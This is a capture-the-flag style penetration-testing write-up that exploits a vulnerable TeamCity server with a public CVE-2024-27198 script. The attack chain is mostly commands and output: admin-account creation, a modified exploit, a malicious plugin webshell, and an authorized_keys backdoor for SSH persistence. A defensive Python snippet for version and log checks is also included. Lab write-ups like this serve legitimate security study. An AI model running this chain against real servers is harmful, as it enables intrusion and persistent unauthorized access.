Authentication Bypass + RCE
The target TeamCity instance is vulnerable to both CVE-2024-27198 and CVE-2024-27199 because it runs an outdated version, 2023.05.4 (build 129421).
┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ python3 CVE-2024-27198-RCE/CVE-2024-27198-RCE.py --target http://teams.onlyrands.com --domain onlyrands.com --behinder4
_____ ____ _ _ ____ ____ _____
|_ _|__ __ _ _ __ ___ / ___(_) |_ _ _ | _ \ / ___| ____|
| |/ _ \/ _` | '_ ` _ \| | | | __| | | | | |_) | | | _|
| | __/ (_| | | | | | | |___| | |_| |_| | | _ <| |___| |___
|_|\___|\__,_|_| |_| |_|\____|_|\__|\__, | |_| \_\\____|_____|
|___/
Author: @W01fh4cker
Github: https://github.com/W01fh4cker
[+] User added successfully, username: 4p0r4p3m, password: 9wypHKrPTp, user ID: 21
[+] The target operating system version is linux
[+] Please start executing commands freely! Type <quit> to end command execution
command > id
[-] Match failed. Response text:
Responding with error, status code: 400 (Bad Request).
Details: jetbrains.buildServer.server.rest.errors.BadRequestException: This server is not configured to allow process debug launch via "rest.debug.processes.enable" internal property
Invalid request. Please check the request URL and data are correct.
Executing the exploit script successfully created an admin account, 4p0r4p3m:9wypHKrPTp.
Interestingly, it does not appear to have uploaded the webshell, and the command fails to execute: the server rejects the debug process launch because the rest.debug.processes.enable internal property is not set.
Modification
Checking the source code of the exploit, it was not uploading the webshell because line 409 specifies a version that does not match the target TeamCity instance, so the script never took the plugin-upload path. So I fixed it.
Exploitation
┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ python3 CVE-2024-27198-RCE/CVE-2024-27198-RCE.py --target http://teams.onlyrands.com --domain onlyrands.com
Author: @W01fh4cker
Github: https://github.com/W01fh4cker
[+] User added successfully, username: drl2qqgm, password: 4gNrmYuT9c, user ID: 25
[+] The target operating system version is linux
[!] The current version is: 2023.05.4 (build 129421). The official has deleted the /app/rest/debug/processes port. You can only upload a malicious plugin to upload webshell and cause RCE.
[!] The program will automatically upload the webshell ofbehinder3.0. You can also specify the file to be uploaded through the parameter -f. Do you wish to continue? (y/n)y
[+] The malicious plugin jF1u7x1R was successfully uploaded and is trying to be activated
[+] Successfully load plugin jF1u7x1R
[+] The malicious plugin jF1u7x1R was successfully activated! Webshell url: http://teams.onlyrands.com/plugins/jF1u7x1R/jF1u7x1R.jsp
[+] Please start executing commands freely! Type <quit> to end command execution
command > id
uid=1015(git) gid=1005(git) groups=1005(git)
Code execution confirmed
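A defender-side check for the two things this walkthrough exposes, the outdated version banner at the top and the request paths the exploit touches, as an added Python example that is not part of the original write-up or of the exploit script: it parses the TeamCity version banner and compares it with 2023.11.4 (assumed here to be the release that fixes both CVEs), and scans constructed access-log lines for the /app/rest/debug/processes endpoint and for a JSP served from a same-named plugin directory, the pattern of the webshell URL above.

```python
import re

# Assumption: 2023.11.4 is the first TeamCity release that fixes CVE-2024-27198 and
# CVE-2024-27199; earlier versions such as the 2023.05.4 on this page are affected.
FIXED_VERSION = (2023, 11, 4)
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?\s*\(build\s+(\d+)\)")
# Patterns taken from this walkthrough: the debug endpoint the exploit first tries,
# and a JSP served from a plugin whose directory name equals the JSP name.
DEBUG_PROCESSES = re.compile(r"^/app/rest/debug/processes(?:[/?]|$)")
PLUGIN_JSP = re.compile(r"^/plugins/([A-Za-z0-9_-]+)/\1\.jsp(?:[?]|$)")
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def parse_version(banner):
    """Parse a banner like '2023.05.4 (build 129421)' into ((2023, 5, 4), 129421)."""
    m = VERSION_RE.search(banner)
    if not m:
        raise ValueError("unrecognised TeamCity version banner: %r" % banner)
    major, minor, patch, build = m.groups()
    return (int(major), int(minor), int(patch or 0)), int(build)

def is_affected(banner):
    """True when the reported version predates the fixed release."""
    version, _build = parse_version(banner)
    return version < FIXED_VERSION

def suspicious_requests(log_lines):
    """Return (reason, path, status) for every access-log line hitting a flagged path."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # not a request line; skip it
        path = m.group("path")
        if DEBUG_PROCESSES.search(path):
            hits.append(("debug-processes endpoint", path, int(m.group("status"))))
        elif PLUGIN_JSP.search(path):
            hits.append(("jsp served from same-named plugin", path, int(m.group("status"))))
    return hits

# Constructed access-log lines modelled on the requests visible in this walkthrough.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Apr/2025:19:58:01 +0000] "GET /login.html HTTP/1.1" 200 4311',
    '10.0.0.5 - - [07/Apr/2025:19:58:40 +0000] "POST /app/rest/debug/processes HTTP/1.1" 400 212',
    '10.0.0.5 - - [07/Apr/2025:20:01:12 +0000] "GET /plugins/jF1u7x1R/jF1u7x1R.jsp HTTP/1.1" 200 97',
    '10.0.0.5 - - [07/Apr/2025:20:01:13 +0000] "GET /plugins/ssh-agent/css/style.css HTTP/1.1" 200 512',
]
```

The same-named-plugin rule is a heuristic; a legitimate plugin can ship a JSP with its own name, so pair it with an allowlist of installed plugins before alerting.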
command > mkdir -p ~/.ssh
command > echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali > ~/.ssh/authorized_keys
Writing an SSH public key into the git user's authorized_keys file for a stable shell
SSH
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh git@onlyrands.com -i ~/.ssh/id_ed25519
The authenticity of host 'onlyrands.com (192.168.219.91)' can't be established.
ED25519 key fingerprint is SHA256:bdEzYRpG4k3NkIr03/E2H6ltJRUD52Zi5YA0fkNr/nY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:170: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'onlyrands.com' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-182-generic x86_64)
System information as of Mon 07 Apr 2025 08:06:51 PM UTC
System load: 0.09
Processes: 228
Usage of /: 87.8% of 9.75GB
Users logged in: 0
Memory usage: 62%
IPv4 address for ens160: 192.168.219.91
Swap usage: 0%
=> / is using 87.8% of 9.75GB
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
git@onlyrands:~$ whoami
git
git@onlyrands:~$ hostname
onlyrands.com
git@onlyrands:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:0d:9e brd ff:ff:ff:ff:ff:ff
inet 192.168.219.91/24 brd 192.168.219.255 scope global ens160
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the git user by exploiting CVE-2024-27198 and CVE-2024-27199.